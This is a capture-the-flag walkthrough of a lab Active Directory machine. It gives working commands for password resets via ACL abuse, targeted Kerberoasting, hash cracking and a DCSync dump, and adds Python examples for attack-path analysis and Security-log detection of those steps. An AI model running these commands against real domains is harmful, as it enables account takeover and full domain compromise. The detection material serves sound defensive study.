Administrator
Initial machine information
As is common in real-life Windows pentests, you start the Administrator box with credentials for the following account:
Username: Olivia
Password: ichliebedich
Overview
Administrator is a classic Active Directory privilege escalation chain. The starting credentials (Olivia) are enough to collect BloodHound data, which maps the chain: Olivia has GenericAll over Michael, Michael has ForcePasswordChange over Benjamin, and Benjamin has FTP access to a Password Safe backup. The psafe3 backup cracks with john, revealing Emily's credentials. Emily has GenericWrite over Ethan, who holds DCSync rights; a targeted Kerberoast of Ethan gives a crackable hash, and DCSync then yields the Administrator hash.
Recon
Nmap
```bash
sudo nmap -sC -sV -vv -oA tcp 10.129.2.149 && sudo nmap -sC -sV -vv -p- -oA allports 10.129.2.149
```
Starting credentials: Olivia:ichliebedich
Validate and check the initial user's access:
Time Synchronisation
Kerberos requires clock synchronisation. Sync to the DC:
```bash
ntpdate 10.129.2.149
```
BloodHound Collection
```bash
bloodhound-ce-python -c all -u Olivia -p ichliebedich -d administrator.htb \
  -dc administrator.htb --dns-tcp -ns 10.129.2.149
```
BloodHound Path Analysis
Ethan has DCSync rights:
Emily has GenericWrite over Ethan - can targeted Kerberoast him:
Olivia has GenericAll over Michael - can reset his password:
Michael has ForcePasswordChange over Benjamin:
Full chain: Olivia → Michael → Benjamin → FTP → psafe3 → Emily → Ethan → DCSync → Administrator
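The chain above is what BloodHound's shortest-path query produces from the collected ACL edges. The following is an added example, not part of the original writeup, that performs the same search over a constructed edge list reproducing the rights found here. The ACL edges alone give two disconnected chains; the hop from Benjamin to Emily is not an ACL but a credential left in a backup, so it is modelled as a separate, constructed `CredentialInBackup` edge. From the defender's side, `principals_reaching` is the list of accounts whose ACEs need review because they can reach replication rights.

```python
"""Shortest-path search over AD control edges, the way BloodHound does it.

Added example, not part of the original writeup. EDGES is a constructed
sample reproducing the rights the writeup found; CREDENTIAL_EDGES models the
non-ACL hop (Emily's password sitting in a backup on Benjamin's FTP share).
"""
from collections import deque

# (holder, right, target) - constructed from the writeup's BloodHound findings
EDGES = [
    ("OLIVIA", "GenericAll", "MICHAEL"),
    ("MICHAEL", "ForcePasswordChange", "BENJAMIN"),
    ("EMILY", "GenericWrite", "ETHAN"),
    ("ETHAN", "DCSync", "ADMINISTRATOR.HTB"),
]
# Not an ACL: an observed credential exposure. The label is a constructed name.
CREDENTIAL_EDGES = [("BENJAMIN", "CredentialInBackup", "EMILY")]


def build_graph(edges):
    """Adjacency list: holder -> [(right, target), ...]."""
    graph = {}
    for holder, right, target in edges:
        graph.setdefault(holder, []).append((right, target))
    return graph


def find_path(graph, start, goal):
    """Breadth-first search; returns the shortest chain as a list of
    (holder, right, target) triples, or None when goal is unreachable."""
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        if node == goal:
            return path
        for right, target in graph.get(node, []):
            if target not in seen:
                seen.add(target)
                queue.append((target, path + [(node, right, target)]))
    return None


def principals_reaching(graph, goal):
    """Every holder in the graph that can reach goal: the ACE review list."""
    return sorted(h for h in graph
                  if h != goal and find_path(graph, h, goal) is not None)


def describe(path):
    """Render a path as 'A -Right-> B -Right-> C' for a report."""
    if not path:
        return ""
    out = path[0][0]
    for _, right, target in path:
        out += f" -{right}-> {target}"
    return out


if __name__ == "__main__":
    acl_only = build_graph(EDGES)
    print("ACL edges only, reach DC:", principals_reaching(acl_only, "ADMINISTRATOR.HTB"))
    full = build_graph(EDGES + CREDENTIAL_EDGES)
    print("With credential hop, reach DC:", principals_reaching(full, "ADMINISTRATOR.HTB"))
    print(describe(find_path(full, "OLIVIA", "ADMINISTRATOR.HTB")))
```

Run as-is it prints that only Emily and Ethan reach the DC through ACLs, and that every account in the sample reaches it once the credential exposure is added. The fix on the defender's side is the same in both views: remove the GenericAll, ForcePasswordChange and GenericWrite ACEs and the replication rights on Ethan, and the graph falls apart regardless of what is in the backup.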
Enumerate services before working through the chain:
Foothold
Step 1 - Olivia resets Michael's password
GenericAll is the most permissive AD right - it includes the ability to reset passwords without knowing the current one:
```bash
net rpc password "michael" "newP@ssword2022" \
  -U "administrator.htb"/"Olivia"%"ichliebedich" -S "10.129.2.149"
```
Step 2 - Michael forces Benjamin's password change
ForcePasswordChange (WriteProp on pwdLastSet) allows resetting another user's password:
```bash
net rpc password "BENJAMIN" "newP@ssword2022" \
  -U "administrator.htb"/"michael"%"newP@ssword2022" -S "10.129.2.149"
```
Step 3 - Benjamin's FTP Access
Benjamin has access to FTP:
A backup.psafe3 file is found:
Step 4 - Crack the Password Safe
Use John the Ripper with its pwsafe2john utility to convert the psafe3 file into a crackable hash format:
Step 5 - Open the Password Safe
Install pwsafe and open backup.psafe3 with the cracked master password:
The vault contains credentials including Emily's. Test Emily's credentials:
Privilege Escalation
Targeted Kerberoast - Ethan
Emily has GenericWrite over Ethan. Use targetedKerberoast to set an SPN on Ethan and request his TGS:
```bash
python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' \
  -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' \
  -o /mnt/hgfs/I/data/htb/machines-stream/administrator/loot/ethan_hash -f hashcat
```
Crack Ethan's hash:
```bash
hashcat -m 13100 -a 0 ethan_hash /mnt/hgfs/I/data/rockyou.txt
```
Cracked: Ethan:limpbizkit
DCSync
Ethan has DCSync rights (DS-Replication-Get-Changes-All). Use impacket-secretsdump to extract the Administrator hash:
```bash
impacket-secretsdump -just-dc-user Administrator \
  administrator.htb/ethan:limpbizkit@10.129.2.149
```
Pass-the-Hash with the Administrator NTLM hash for the root flag.
Attack Chain Summary
| Phase | Technique | Result |
|---|---|---|
| Recon | BloodHound | Full ACL chain mapped |
| GenericAll | net rpc password reset | Michael credentials |
| ForcePasswordChange | net rpc password reset | Benjamin credentials |
| FTP | Download backup.psafe3 | Password Safe file |
| Credential access | john + pwsafe | Emily credentials |
| Targeted Kerberoast | GenericWrite → SPN → TGS | Ethan:limpbizkit |
| DCSync | impacket-secretsdump | Administrator NT hash |
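Each step in the table leaves a distinct trace in the domain controller's Security log: the two password resets are event 4724, the targeted Kerberoast is a 5136 servicePrincipalName write on a user object followed by a 4769 RC4 service-ticket request for that account, and DCSync is a 4662 whose Properties carry a replication control-access-right GUID from an account that is not a domain controller. The following is an added example, not part of the original writeup, that runs those three detections over a constructed set of events. Field names follow the Security log's XML event data; the times, hosts and values are invented, and treating every account ending in `$` as a DC is an assumption made for the sample.

```python
"""Detections for the three loudest steps of this chain, from Security-log
events. Added example, not part of the original writeup. EVENTS is a
constructed sample (field names follow the Security log's XML event data;
times, hosts and values are invented). The allow-list of replicating accounts
is an assumption: here, any account ending in '$' is treated as a DC.
"""
from datetime import datetime, timedelta

# Control-access-right GUIDs that grant directory replication.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}

T0 = datetime(2024, 1, 1, 10, 0)
EVENTS = [  # constructed sample, mirroring the writeup's chain
    {"EventID": 4724, "Time": T0, "SubjectUserName": "Olivia", "TargetUserName": "michael"},
    {"EventID": 4724, "Time": T0 + timedelta(minutes=2), "SubjectUserName": "michael",
     "TargetUserName": "BENJAMIN"},
    {"EventID": 5136, "Time": T0 + timedelta(minutes=30), "SubjectUserName": "emily",
     "ObjectDN": "CN=ethan,CN=Users,DC=administrator,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName", "OperationType": "%%14674"},
    {"EventID": 4769, "Time": T0 + timedelta(minutes=31), "TargetUserName": "emily@ADMINISTRATOR.HTB",
     "ServiceName": "ethan", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "Time": T0 + timedelta(minutes=32), "TargetUserName": "emily@ADMINISTRATOR.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12"},            # benign AES ticket
    {"EventID": 4662, "Time": T0 + timedelta(minutes=45), "SubjectUserName": "DC$",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},  # benign DC replication
    {"EventID": 4662, "Time": T0 + timedelta(minutes=50), "SubjectUserName": "ethan",
     "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def is_dc_account(name):
    # Assumption for the sample: computer accounts (trailing '$') are the DCs.
    return name.endswith("$")


def detect_password_resets(events, allowed_subjects=()):
    """4724 = 'An attempt was made to reset an account's password'. A reset by
    anyone outside the helpdesk/admin allow-list is the GenericAll and
    ForcePasswordChange steps of the chain."""
    return [f"4724: {e['SubjectUserName']} reset password of {e['TargetUserName']}"
            for e in events
            if e["EventID"] == 4724 and e["SubjectUserName"] not in allowed_subjects]


def detect_targeted_kerberoast(events, window=timedelta(hours=1)):
    """5136 adding servicePrincipalName to a user object, followed within
    `window` by a 4769 RC4 (0x17) service ticket for that same account."""
    spn_added = {}  # account name -> (time, who wrote the SPN)
    alerts = []
    for e in sorted(events, key=lambda ev: ev["Time"]):
        if (e["EventID"] == 5136
                and e["AttributeLDAPDisplayName"] == "servicePrincipalName"
                and e["OperationType"] == "%%14674"):  # %%14674 = value added
            account = e["ObjectDN"].split(",")[0].split("=", 1)[1].lower()
            spn_added[account] = (e["Time"], e["SubjectUserName"])
        elif e["EventID"] == 4769 and e["TicketEncryptionType"] == "0x17":
            svc = e["ServiceName"].lower()
            if svc in spn_added and e["Time"] - spn_added[svc][0] <= window:
                _, writer = spn_added[svc]
                alerts.append(f"targeted Kerberoast: {writer} added SPN to {svc}, "
                              f"RC4 TGS requested by {e['TargetUserName']}")
    return alerts


def detect_dcsync(events):
    """4662 whose Properties carry a replication GUID, from a non-DC account."""
    alerts = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        guids = {tok.strip("{}").lower() for tok in e["Properties"].split()
                 if tok.startswith("{")}
        hits = guids & REPLICATION_GUIDS
        if hits and not is_dc_account(e["SubjectUserName"]):
            alerts.append(f"DCSync: {e['SubjectUserName']} used {sorted(hits)}")
    return alerts


def run_all(events, allowed_subjects=()):
    return (detect_password_resets(events, allowed_subjects)
            + detect_targeted_kerberoast(events)
            + detect_dcsync(events))


if __name__ == "__main__":
    for line in run_all(EVENTS):
        print(line)
```

The 4724 rule is only useful with a maintained allow-list of accounts that legitimately reset passwords; the Kerberoast rule keys on the SPN write rather than on RC4 tickets alone, because RC4 service tickets still occur in domains with older hosts; and the 4662 rule needs "Audit Directory Service Access" enabled on the DCs, otherwise the event is never written.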